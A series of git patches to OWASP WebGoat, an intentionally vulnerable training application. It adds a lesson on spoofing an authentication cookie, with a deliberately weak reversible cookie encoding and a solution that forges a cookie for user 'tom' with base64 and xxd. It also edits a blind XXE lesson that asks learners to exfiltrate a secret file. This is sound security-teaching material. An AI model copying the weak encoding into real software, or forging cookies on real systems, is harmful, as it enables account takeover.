From 42369816c94cb5a92d7a4b53eb6cd01df5bacb93 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Fri, 17 Sep 2021 13:46:58 +0200
Subject: [PATCH 001/227] 1026 (#1047)

* Move back to Java 15 as XML parsers fail with XXE lesson

* Documentation improvement
---
 docker/Dockerfile                                             | 2 +-
 .../main/resources/lessonPlans/en/XXE_blind_assignment.adoc   | 4 ++--
 2 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/docker/Dockerfile b/docker/Dockerfile
index 1437def53..3047632a2 100644
--- a/docker/Dockerfile
+++ b/docker/Dockerfile
@@ -1,4 +1,4 @@
-FROM openjdk:16-slim
+FROM openjdk:15-slim
 
 ARG webgoat_version=8.2.1-SNAPSHOT
 ENV webgoat_version_env=${webgoat_version}
diff --git a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc b/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc
index e7d2d112a..f80227542 100644
--- a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc
+++ b/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc
@@ -1,6 +1,6 @@
 == Blind XXE assignment
 
-In the previous page we showed you how you can ping a server with a XXE attack, in this assignment try to make a DTD which will upload the contents of a file secret.txt from the WebGoat server to our WebWolf server. You can use WebWolf to serve your DTD. The secret.txt is located on the WebGoat server in this location, so you do not need to scan all directories and files:
+In the previous page we showed you how you can ping a server with a XXE attack, in this assignment try to make a DTD which will upload the contents of a file `secret.txt` from the WebGoat server to our WebWolf server. You can use WebWolf to serve your DTD. The `secret.txt` is located on the WebGoat server in this location, so you do not need to scan all directories and files:
 
 
 |===
@@ -13,4 +13,4 @@ In the previous page we showed you how you can ping a server with a XXE attack,
 
 Try to upload this file using WebWolf landing page for example: `webWolfRootLink:landing?text=contents_file[noLink,target=landing]`
 (NOTE: this endpoint is under your full control)
-Once you obtained the contents of the file post it as a new comment on the page and you will solve the lesson.
\ No newline at end of file
+Once you obtained the contents of the file post it as a new comment on the page, and you will solve the lesson.
\ No newline at end of file

From a4218b00163f043cf744a84d77546d5cab70b71d Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Ren=C3=A9=20Zubcevic?= <rene@zubcevic.com>
Date: Fri, 17 Sep 2021 17:10:15 +0200
Subject: [PATCH 002/227] Update start.sh

10 seconds is sometime to fast. WebWolf will fail to start if the database of WebGoat is not up.
---
 docker/start.sh | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/docker/start.sh b/docker/start.sh
index b1194e169..de84b044a 100644
--- a/docker/start.sh
+++ b/docker/start.sh
@@ -16,7 +16,7 @@ java \
  --add-opens java.base/java.io=ALL-UNNAMED \
  -jar webgoat.jar --webgoat.build.version="$1" --server.address=0.0.0.0 > webgoat.log &
 
-sleep 10
+sleep 30
 
 echo "Starting WebWolf..."
 java -Duser.home=/home/webgoat -Dfile.encoding=UTF-8 -jar webwolf.jar --webgoat.build.version=$1 --server.address=0.0.0.0 > webwolf.log &

From 8e567b0f86ddb124c8393a111d65115c0e0756c0 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=80ngel=20Oll=C3=A9=20Bl=C3=A1zquez?= <angel@olleb.com>
Date: Sun, 8 Aug 2021 23:30:05 +0200
Subject: [PATCH 003/227] Spoofing an Authentication Cookie lesson

---
 .../org/owasp/webgoat/lessons/Category.java   |   2 +-
 webgoat-lessons/pom.xml                       |   1 +
 webgoat-lessons/spoof-cookie/pom.xml          |  58 +++++
 .../webgoat/spoofcookie/SpoofCookie.java      |  47 ++++
 .../spoofcookie/SpoofCookieAssignment.java    | 121 +++++++++++
 .../webgoat/spoofcookie/encoders/EncDec.java  |  98 +++++++++
 .../src/main/resources/html/SpoofCookie.html  |  32 +++
 .../resources/i18n/WebGoatLabels.properties   |   7 +
 .../src/main/resources/js/handler.js          |  31 +++
 .../lessonPlans/en/SpoofCookie_content0.adoc  |  30 +++
 .../lessonPlans/en/SpoofCookie_plan.adoc      |  18 ++
 .../en/SpoofCookie_solution.adoc              |  88 ++++++++
 .../lessonSolutions/html/SpoofCookie.html     |  14 ++
 .../src/main/resources/templates/form.html    |  30 +++
 .../SpoofCookieAssignmentTest.java            | 205 ++++++++++++++++++
 .../spoofcookie/encoders/EncDecTest.java      |  89 ++++++++
 webgoat-server/pom.xml                        |   5 +
 17 files changed, 875 insertions(+), 1 deletion(-)
 create mode 100644 webgoat-lessons/spoof-cookie/pom.xml
 create mode 100644 webgoat-lessons/spoof-cookie/src/main/java/org/owasp/webgoat/spoofcookie/SpoofCookie.java
 create mode 100644 webgoat-lessons/spoof-cookie/src/main/java/org/owasp/webgoat/spoofcookie/SpoofCookieAssignment.java
 create mode 100644 webgoat-lessons/spoof-cookie/src/main/java/org/owasp/webgoat/spoofcookie/encoders/EncDec.java
 create mode 100644 webgoat-lessons/spoof-cookie/src/main/resources/html/SpoofCookie.html
 create mode 100644 webgoat-lessons/spoof-cookie/src/main/resources/i18n/WebGoatLabels.properties
 create mode 100644 webgoat-lessons/spoof-cookie/src/main/resources/js/handler.js
 create mode 100644 webgoat-lessons/spoof-cookie/src/main/resources/lessonPlans/en/SpoofCookie_content0.adoc
 create mode 100644 webgoat-lessons/spoof-cookie/src/main/resources/lessonPlans/en/SpoofCookie_plan.adoc
 create mode 100644 webgoat-lessons/spoof-cookie/src/main/resources/lessonSolutions/en/SpoofCookie_solution.adoc
 create mode 100644 webgoat-lessons/spoof-cookie/src/main/resources/lessonSolutions/html/SpoofCookie.html
 create mode 100644 webgoat-lessons/spoof-cookie/src/main/resources/templates/form.html
 create mode 100644 webgoat-lessons/spoof-cookie/src/test/java/org/owasp/webgoat/spoofcookie/SpoofCookieAssignmentTest.java
 create mode 100644 webgoat-lessons/spoof-cookie/src/test/java/org/owasp/webgoat/spoofcookie/encoders/EncDecTest.java

diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/lessons/Category.java b/webgoat-container/src/main/java/org/owasp/webgoat/lessons/Category.java
index c2dc60343..e510ca14a 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/lessons/Category.java
+++ b/webgoat-container/src/main/java/org/owasp/webgoat/lessons/Category.java
@@ -48,6 +48,7 @@ public enum Category {
     XSS("(A7) Cross-Site Scripting (XSS)", 307),
     INSECURE_DESERIALIZATION("(A8) Insecure Deserialization", 308),
     VULNERABLE_COMPONENTS("(A9) Vulnerable Components", 309),
+    SESSION_MANAGEMENT("(A10) Session Management Flaws", 310),
     
     REQUEST_FORGERIES("(A8:2013) Request Forgeries", 318),
 
@@ -66,7 +67,6 @@ public enum Category {
     DOS("Denial of Service", 1500),
     MALICIOUS_EXECUTION("Malicious Execution", 1600),
     CLIENT_SIDE("Client side", 1700),
-    SESSION_MANAGEMENT("Session Management Flaws", 1800),
     WEB_SERVICES("Web Services", 1900),
     ADMIN_FUNCTIONS("Admin Functions", 2000),
     CHALLENGE("Challenges", 3000);
diff --git a/webgoat-lessons/pom.xml b/webgoat-lessons/pom.xml
index 42be3473c..52cf5b8f0 100644
--- a/webgoat-lessons/pom.xml
+++ b/webgoat-lessons/pom.xml
@@ -41,6 +41,7 @@
         <module>webgoat-lesson-template</module>
 		<module>crypto</module>
         <module>path-traversal</module>
+        <module>spoof-cookie</module>
     </modules>
 
     <dependencies>
diff --git a/webgoat-lessons/spoof-cookie/pom.xml b/webgoat-lessons/spoof-cookie/pom.xml
new file mode 100644
index 000000000..a1542e2ed
--- /dev/null
+++ b/webgoat-lessons/spoof-cookie/pom.xml
@@ -0,0 +1,58 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+	xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+	xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+	<modelVersion>4.0.0</modelVersion>
+	<artifactId>spoof-cookie</artifactId>
+	<packaging>jar</packaging>
+	<parent>
+		<groupId>org.owasp.webgoat.lesson</groupId>
+		<artifactId>webgoat-lessons-parent</artifactId>
+		<version>8.2.1-SNAPSHOT</version>
+	</parent>
+
+	<properties>
+		<jacoco.version>0.8.7</jacoco.version>
+	</properties>
+
+	<profiles>
+		<profile>
+			<!-- mvn clean verify -Pcoverage -->
+			<id>coverage</id>
+			<activation>
+				<activeByDefault>false</activeByDefault>
+			</activation>
+			<build>
+				<plugins>
+					<plugin>
+						<groupId>org.jacoco</groupId>
+						<artifactId>jacoco-maven-plugin</artifactId>
+						<version>${jacoco.version}</version>
+						<executions>
+							<execution>
+								<id>default-prepare-agent</id>
+								<goals>
+									<goal>prepare-agent</goal>
+								</goals>
+							</execution>
+							<execution>
+								<id>default-report</id>
+								<phase>verify</phase>
+								<goals>
+									<goal>report</goal>
+								</goals>
+								<configuration>
+									<dataFile>${project.build.directory}/jacoco.exec</dataFile>
+									<outputDirectory>${project.reporting.outputDirectory}/jacoco</outputDirectory>
+									<excludes>
+										<exclude>**/SpoofCookie.*</exclude>
+									</excludes>
+								</configuration>
+							</execution>
+						</executions>
+					</plugin>
+				</plugins>
+			</build>
+		</profile>
+	</profiles>
+
+</project>
diff --git a/webgoat-lessons/spoof-cookie/src/main/java/org/owasp/webgoat/spoofcookie/SpoofCookie.java b/webgoat-lessons/spoof-cookie/src/main/java/org/owasp/webgoat/spoofcookie/SpoofCookie.java
new file mode 100644
index 000000000..41382a4d0
--- /dev/null
+++ b/webgoat-lessons/spoof-cookie/src/main/java/org/owasp/webgoat/spoofcookie/SpoofCookie.java
@@ -0,0 +1,47 @@
+/*
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
+ *
+ * Copyright (c) 2002 - 2021 Bruce Mayhew
+ *
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
+ *
+ * Getting Source ==============
+ *
+ * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
+ */
+
+package org.owasp.webgoat.spoofcookie;
+
+import org.owasp.webgoat.lessons.Category;
+import org.owasp.webgoat.lessons.Lesson;
+import org.springframework.stereotype.Component;
+
+/***
+ *
+ * @author Angel Olle Blazquez
+ *
+ */
+
+@Component
+public class SpoofCookie extends Lesson {
+
+    @Override
+    public Category getDefaultCategory() {
+        return Category.SESSION_MANAGEMENT;
+    }
+
+    @Override
+    public String getTitle() {
+        return "spoofcookie.title";
+    }
+}
diff --git a/webgoat-lessons/spoof-cookie/src/main/java/org/owasp/webgoat/spoofcookie/SpoofCookieAssignment.java b/webgoat-lessons/spoof-cookie/src/main/java/org/owasp/webgoat/spoofcookie/SpoofCookieAssignment.java
new file mode 100644
index 000000000..2f7fd4a26
--- /dev/null
+++ b/webgoat-lessons/spoof-cookie/src/main/java/org/owasp/webgoat/spoofcookie/SpoofCookieAssignment.java
@@ -0,0 +1,121 @@
+/*
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
+ *
+ * Copyright (c) 2002 - 2021 Bruce Mayhew
+ *
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
+ *
+ * Getting Source ==============
+ *
+ * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
+ */
+
+package org.owasp.webgoat.spoofcookie;
+
+import java.util.Map;
+
+import javax.servlet.http.Cookie;
+import javax.servlet.http.HttpServletResponse;
+
+import org.apache.commons.lang3.StringUtils;
+import org.owasp.webgoat.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.spoofcookie.encoders.EncDec;
+import org.springframework.web.bind.UnsatisfiedServletRequestParameterException;
+import org.springframework.web.bind.annotation.CookieValue;
+import org.springframework.web.bind.annotation.ExceptionHandler;
+import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.PostMapping;
+import org.springframework.web.bind.annotation.RequestParam;
+import org.springframework.web.bind.annotation.ResponseBody;
+import org.springframework.web.bind.annotation.RestController;
+
+/***
+ *
+ * @author Angel Olle Blazquez
+ *
+ */
+
+@RestController
+public class SpoofCookieAssignment extends AssignmentEndpoint {
+
+    private static final String COOKIE_NAME = "spoof_auth";
+    private static final String COOKIE_INFO = "Cookie details for user %s:<br />" + COOKIE_NAME + "=%s";
+    private static final String ATTACK_USERNAME = "tom";
+
+    private static final Map<String, String> users = Map.of(
+        "webgoat", "webgoat",
+        "admin", "admin",
+        ATTACK_USERNAME, "apasswordfortom");
+
+    @PostMapping(path = "/SpoofCookie/login")
+    @ResponseBody
+    @ExceptionHandler(UnsatisfiedServletRequestParameterException.class)
+    public AttackResult login(
+        @RequestParam String username,
+        @RequestParam String password,
+        @CookieValue(value = COOKIE_NAME, required = false) String cookieValue,
+        HttpServletResponse response) {
+
+        if (StringUtils.isEmpty(cookieValue)) {
+            return credentialsLoginFlow(username, password, response);
+        } else {
+            return cookieLoginFlow(cookieValue);
+        }
+    }
+
+    @GetMapping(path = "/SpoofCookie/cleanup")
+    public void cleanup(HttpServletResponse response) {
+        Cookie cookie = new Cookie(COOKIE_NAME, "");
+        cookie.setMaxAge(0);
+        response.addCookie(cookie);
+    }
+
+    private AttackResult credentialsLoginFlow(String username, String password, HttpServletResponse response) {
+        String lowerCasedUsername = username.toLowerCase();
+        if (ATTACK_USERNAME.equals(lowerCasedUsername) && users.get(lowerCasedUsername).equals(password)) {
+            return informationMessage(this).feedback("spoofcookie.cheating").build();
+        }
+
+        String authPassword = users.getOrDefault(lowerCasedUsername, "");
+        if (!authPassword.isBlank() && authPassword.equals(password)) {
+            String newCookieValue = EncDec.encode(lowerCasedUsername);
+            Cookie newCookie = new Cookie(COOKIE_NAME, newCookieValue);
+            newCookie.setPath("/WebGoat");
+            newCookie.setSecure(true);
+            response.addCookie(newCookie);
+            return informationMessage(this).feedback("spoofcookie.login").output(String.format(COOKIE_INFO, lowerCasedUsername, newCookie.getValue())).build();
+        }
+
+        return informationMessage(this).feedback("spoofcookie.wrong-login").build();
+    }
+
+    private AttackResult cookieLoginFlow(String cookieValue) {
+        String cookieUsername;
+        try {
+            cookieUsername = EncDec.decode(cookieValue).toLowerCase();
+        } catch (Exception e) {
+            // for providing some instructive guidance, we won't return 4xx error here
+            return failed(this).output(e.getMessage()).build();
+        }
+        if (users.containsKey(cookieUsername)) {
+            if (cookieUsername.equals(ATTACK_USERNAME)) {
+                return success(this).build();
+            }
+            return failed(this).feedback("spoofcookie.cookie-login").output(String.format(COOKIE_INFO, cookieUsername, cookieValue)).build();
+        }
+
+        return failed(this).feedback("spoofcookie.wrong-cookie").build();
+    }
+
+}
diff --git a/webgoat-lessons/spoof-cookie/src/main/java/org/owasp/webgoat/spoofcookie/encoders/EncDec.java b/webgoat-lessons/spoof-cookie/src/main/java/org/owasp/webgoat/spoofcookie/encoders/EncDec.java
new file mode 100644
index 000000000..71ffc8b3d
--- /dev/null
+++ b/webgoat-lessons/spoof-cookie/src/main/java/org/owasp/webgoat/spoofcookie/encoders/EncDec.java
@@ -0,0 +1,98 @@
+/*
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
+ *
+ * Copyright (c) 2002 - 2021 Bruce Mayhew
+ *
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
+ *
+ * Getting Source ==============
+ *
+ * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
+ */
+
+package org.owasp.webgoat.spoofcookie.encoders;
+
+import java.nio.charset.StandardCharsets;
+import java.util.Base64;
+
+import org.apache.commons.lang3.RandomStringUtils;
+import org.springframework.security.crypto.codec.Hex;
+
+/***
+ *
+ * @author Angel Olle Blazquez
+ *
+ */
+
+public class EncDec {
+
+    // PoC: weak encoding method
+
+    private static final String SALT = RandomStringUtils.randomAlphabetic(10);
+
+    private EncDec() {
+
+    }
+
+    public static String encode(final String value) {
+        if (value == null) {
+            return null;
+        }
+
+        String encoded = value.toLowerCase() + SALT;
+        encoded = revert(encoded);
+        encoded = hexEncode(encoded);
+        return base64Encode(encoded);
+    }
+
+    public static String decode(final String encodedValue) throws IllegalArgumentException {
+        if (encodedValue == null) {
+            return null;
+        }
+
+        String decoded = base64Decode(encodedValue);
+        decoded = hexDecode(decoded);
+        decoded = revert(decoded);
+        return decoded.substring(0, decoded.length() - SALT.length());
+    }
+
+    private static String revert(final String value) {
+        return new StringBuilder(value)
+            .reverse()
+            .toString();
+    }
+
+    private static String hexEncode(final String value) {
+        char[] encoded = Hex.encode(value.getBytes(StandardCharsets.UTF_8));
+        return new String(encoded);
+    }
+
+    private static String hexDecode(final String value) {
+        byte[] decoded = Hex.decode(value);
+        return new String(decoded);
+    }
+
+    private static String base64Encode(final String value) {
+        return Base64
+            .getEncoder()
+            .encodeToString(value.getBytes());
+    }
+
+    private static String base64Decode(final String value) {
+        byte[] decoded = Base64
+            .getDecoder()
+            .decode(value.getBytes());
+        return new String(decoded);
+    }
+
+}
diff --git a/webgoat-lessons/spoof-cookie/src/main/resources/html/SpoofCookie.html b/webgoat-lessons/spoof-cookie/src/main/resources/html/SpoofCookie.html
new file mode 100644
index 000000000..7a41f948d
--- /dev/null
+++ b/webgoat-lessons/spoof-cookie/src/main/resources/html/SpoofCookie.html
@@ -0,0 +1,32 @@
+<!DOCTYPE html>
+
+<html xmlns:th="http://www.thymeleaf.org">
+
+<link rel="stylesheet" type="text/css"
+	href="http://code.jquery.com/ui/1.9.1/themes/base/jquery-ui.css" />
+
+<script language="JavaScript" th:src="@{/lesson_js/handler.js}"></script>
+
+<!-- 1 -->
+<div class="lesson-page-wrapper">
+	<div class="adoc-content" th:replace="doc:SpoofCookie_plan.adoc"></div>
+</div>
+
+<!-- 2 -->
+<div class="lesson-page-wrapper">
+	<div class="adoc-content" th:replace="doc:SpoofCookie_content0.adoc"></div>
+	<div class="attack-container">
+		<div class="assignment-success">
+			<i class="fa fa-2 fa-check hidden" aria-hidden="true"></i>
+		</div>
+
+		<div class="container-fluid">
+			<div th:include="form" id="content"></div>
+		</div>
+
+		<div class="attack-feedback" id="spoof_attack_feedback"></div>
+		<div class="attack-output" id="spoof_attack_output"></div>
+	</div>
+</div>
+
+</html>
diff --git a/webgoat-lessons/spoof-cookie/src/main/resources/i18n/WebGoatLabels.properties b/webgoat-lessons/spoof-cookie/src/main/resources/i18n/WebGoatLabels.properties
new file mode 100644
index 000000000..4f4aed4aa
--- /dev/null
+++ b/webgoat-lessons/spoof-cookie/src/main/resources/i18n/WebGoatLabels.properties
@@ -0,0 +1,7 @@
+spoofcookie.title=Spoofing an Authentication Cookie
+
+spoofcookie.wrong-login=Login failed.
+spoofcookie.login=Logged in using credentials. Cookie created, see below.
+spoofcookie.cookie-login=Logged in using cookie.
+spoofcookie.wrong-cookie=Wrong cookie sent.
+spoofcookie.cheating=Don't cheat!
diff --git a/webgoat-lessons/spoof-cookie/src/main/resources/js/handler.js b/webgoat-lessons/spoof-cookie/src/main/resources/js/handler.js
new file mode 100644
index 000000000..1a1cddbb4
--- /dev/null
+++ b/webgoat-lessons/spoof-cookie/src/main/resources/js/handler.js
@@ -0,0 +1,31 @@
+function getCookieValue() {
+	var cookie = document.cookie.match(new RegExp('(^| )spoof_auth=([^;]+)'));
+	if (cookie != null)
+		return [2];
+	return null;
+}
+
+function cleanup() {
+	document.cookie = 'spoof_auth=;Max-Age=0;secure=true';
+	$('#spoof_username').removeAttr('disabled');
+	$('#spoof_password').removeAttr('disabled');
+	$('#spoof_submit').removeAttr('disabled');
+	$('#spoof_attack_feedback').html('');
+	$('#spoof_attack_output').html('');
+}
+
+var target = document.getElementById('spoof_attack_feedback');
+
+var obs = new MutationObserver(function(mutations) {
+	mutations.forEach(function() {
+		var cookie = getCookieValue();
+		if (cookie) {
+			$('#spoof_username').prop('disabled', true);
+			$('#spoof_password').prop('disabled', true);
+			$('#spoof_submit').prop('disabled', true);
+		}
+	});
+});
+
+obs.observe(target, { characterData: false, attributes: false, childList: true, subtree: false });
+
diff --git a/webgoat-lessons/spoof-cookie/src/main/resources/lessonPlans/en/SpoofCookie_content0.adoc b/webgoat-lessons/spoof-cookie/src/main/resources/lessonPlans/en/SpoofCookie_content0.adoc
new file mode 100644
index 000000000..132e11bc4
--- /dev/null
+++ b/webgoat-lessons/spoof-cookie/src/main/resources/lessonPlans/en/SpoofCookie_content0.adoc
@@ -0,0 +1,30 @@
+= Spoofing an Authentication Cookie
+
+Bypass the authentication mechanism by spoofing an authentication cookie.
+
+*Notes about the login system*
+
+When an authentication cookie is sent, the system will log in the user directly if the cookie is valid.
+
+When a cookie is not sent, but credentials provided are correct, the system will create an authentication cookie.
+
+The login will be denied on any other cases.
+
+Pay attention to the feedback message that you will get during the attacks.
+
+Known credentials:
+
+[frame=ends]
+|===
+|user name |password
+
+|webgoat
+|webgoat
+
+|admin
+|admin
+|===
+
+*Goal*
+
+When you understand how the authentication cookie is generated, try to _spoof_ the cookie and login as Tom.
diff --git a/webgoat-lessons/spoof-cookie/src/main/resources/lessonPlans/en/SpoofCookie_plan.adoc b/webgoat-lessons/spoof-cookie/src/main/resources/lessonPlans/en/SpoofCookie_plan.adoc
new file mode 100644
index 000000000..cad7f7ba7
--- /dev/null
+++ b/webgoat-lessons/spoof-cookie/src/main/resources/lessonPlans/en/SpoofCookie_plan.adoc
@@ -0,0 +1,18 @@
+= Spoofing an Authentication Cookie
+
+== Concept
+
+Authentication Cookies are used for services that require authentication, when the user logs in with a personal user name and password, the server validates the provided credentials and if those are valid, it creates a session.
+
+Every session usually has a unique ID that identifies the user's session; when the server returns the response to the user, it includes a Set-Cookie header that contains, among other things, the cookie name and value.
+
+The authentication cookie is typically stored on the client and server side.
+
+On the one hand, having the cookie stored on the client side implies that can be stolen by exploiting certain vulnerabilities or intercepted using man in the middle attacks or XSS. On the other, cookie values can be guessed if the algorithm for generating the cookie can be obtained.
+
+Many applications will automatically login a user if the right authentication cookie is provided.
+
+
+== Goals
+
+The user should be able to guess the cookie generation algorithm and bypass the authentication mechanism by logging in as a different user.
diff --git a/webgoat-lessons/spoof-cookie/src/main/resources/lessonSolutions/en/SpoofCookie_solution.adoc b/webgoat-lessons/spoof-cookie/src/main/resources/lessonSolutions/en/SpoofCookie_solution.adoc
new file mode 100644
index 000000000..6d867e3a3
--- /dev/null
+++ b/webgoat-lessons/spoof-cookie/src/main/resources/lessonSolutions/en/SpoofCookie_solution.adoc
@@ -0,0 +1,88 @@
+= Spoofing an Authentication Cookie
+
+== Solution
+
+Some standard Linux tools have been used on this solution; other kind of tools -like online tools- can be used and the same results should be obtained.
+
+=== Analysis and reversing
+
+Inspect the webgoat user spoof_auth cookie value:
+
+[source, text]
+----
+NjM3OTRhNGY0ODRiNTQ0OTU3NDU3NDYxNmY2NzYyNjU3Nw==
+----
+
+It look like a base64 encoded text.
+
+Decoding the base64 text:
+
+[source, sh]
+----
+echo NjM3OTRhNGY0ODRiNTQ0OTU3NDU3NDYxNmY2NzYyNjU3Nw== | base64 -d
+63794a4f484b5449574574616f67626577
+----
+
+Now, it look like a hexadecimal encoded text.
+
+Hexadecimal text decoding:
+
+[source, sh]
+----
+echo 63794a4f484b5449574574616f67626577 | xxd -p -r
+cyJOHKTIWEtaogbew
+----
+
+Now, reverse the text:
+
+[source, text]
+----
+webgoatEWITKHOJyc
+----
+
+We can see the user name with some random text appended. If we request some more different cookies for the same user, we will observe that the cookie generation appends random text of ten characters together with the user name, after it reverses the whole string and encodes it as hexadecimal and base64 respectively.
+
+=== Attacking the system
+
+Let's see how to forge our authentication cookie for tom.
+
+Our initial string will be the user name and a random text of ten characters.
+
+[source,text]
+----
+tomAAAAAAAAAA
+----
+
+Reverse it:
+
+[source, text]
+----
+AAAAAAAAAAmot
+----
+
+Now, encode the text to hexadecimal:
+
+[source,text]
+----
+# warn: do not encode any whitespace or new line character
+echo -n AAAAAAAAAAmot | xxd -ps
+414141414141414141416d6f74
+----
+
+Encode to base64:
+
+[source,text]
+----
+# warn: do not encode any whitespace or new line character
+echo -n 414141414141414141416d6f74 | base64
+NDE0MTQxNDE0MTQxNDE0MTQxNDE2ZDZmNzQ=
+----
+
+The spoof_auth cookie value is:
+
+[source,text]
+----
+NDE0MTQxNDE0MTQxNDE0MTQxNDE2ZDZmNzQ=
+----
+
+Finally, send the cookie to the system using any method that you prefer; OWASP ZAP, curl, the browser developer tools, etc.
diff --git a/webgoat-lessons/spoof-cookie/src/main/resources/lessonSolutions/html/SpoofCookie.html b/webgoat-lessons/spoof-cookie/src/main/resources/lessonSolutions/html/SpoofCookie.html
new file mode 100644
index 000000000..c2dafc5aa
--- /dev/null
+++ b/webgoat-lessons/spoof-cookie/src/main/resources/lessonSolutions/html/SpoofCookie.html
@@ -0,0 +1,14 @@
+<!DOCTYPE html>
+
+<html xmlns:th="http://www.thymeleaf.org">
+
+
+
+	<div class="lesson-page-wrapper">
+		<!-- reuse this block for each 'page' of content -->
+		<!-- include content here ... will be first page/tab  multiple -->
+		<div class="adoc-content" th:replace="doc:SpoofCookie_solution.adoc"></div>
+	</div>
+
+
+</html>
\ No newline at end of file
diff --git a/webgoat-lessons/spoof-cookie/src/main/resources/templates/form.html b/webgoat-lessons/spoof-cookie/src/main/resources/templates/form.html
new file mode 100644
index 000000000..dce39cd1a
--- /dev/null
+++ b/webgoat-lessons/spoof-cookie/src/main/resources/templates/form.html
@@ -0,0 +1,30 @@
+<div class="row">
+	<div class="col-md-4">
+		<form class="attack-form" accept-charset="UNKNOWN" method="POST"
+			action="/WebGoat/SpoofCookie/login">
+			<div style="padding: 20px;" id="password-login">
+				<h4 style="border-bottom: 1px solid #c5c5c5;">Account Access</h4>
+				<fieldset>
+					<div class="form-group input-group">
+						<span class="input-group-addon"> <i
+							class="glyphicon glyphicon-user"></i>
+						</span> <input class="form-control" placeholder="User name"
+							name="username" type="text" id="spoof_username"></input>
+					</div>
+					<div class="form-group input-group">
+						<span class="input-group-addon"><i
+							class="glyphicon glyphicon-lock"></i></span> <input class="form-control"
+							placeholder="Password" name="password" type="password"
+							id="spoof_password" />
+					</div>
+					<button type="submit" class="btn btn-primary btn-block"
+						id="spoof_submit">Access</button>
+					<div style="padding-top: 10px">
+						<a id="cleanup" href="#" onclick="cleanup();return false;">Delete
+							cookie</a>
+					</div>
+				</fieldset>
+			</div>
+		</form>
+	</div>
+</div>
diff --git a/webgoat-lessons/spoof-cookie/src/test/java/org/owasp/webgoat/spoofcookie/SpoofCookieAssignmentTest.java b/webgoat-lessons/spoof-cookie/src/test/java/org/owasp/webgoat/spoofcookie/SpoofCookieAssignmentTest.java
new file mode 100644
index 000000000..acec30454
--- /dev/null
+++ b/webgoat-lessons/spoof-cookie/src/test/java/org/owasp/webgoat/spoofcookie/SpoofCookieAssignmentTest.java
@@ -0,0 +1,205 @@
+/*
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
+ *
+ * Copyright (c) 2002 - 2021 Bruce Mayhew
+ *
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
+ *
+ * Getting Source ==============
+ *
+ * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
+ */
+
+package org.owasp.webgoat.spoofcookie;
+
+import static org.hamcrest.Matchers.emptyString;
+import static org.hamcrest.Matchers.not;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.content;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.cookie;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
+import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
+
+import java.util.stream.Stream;
+
+import javax.servlet.http.Cookie;
+
+import org.hamcrest.CoreMatchers;
+import org.junit.jupiter.api.BeforeEach;
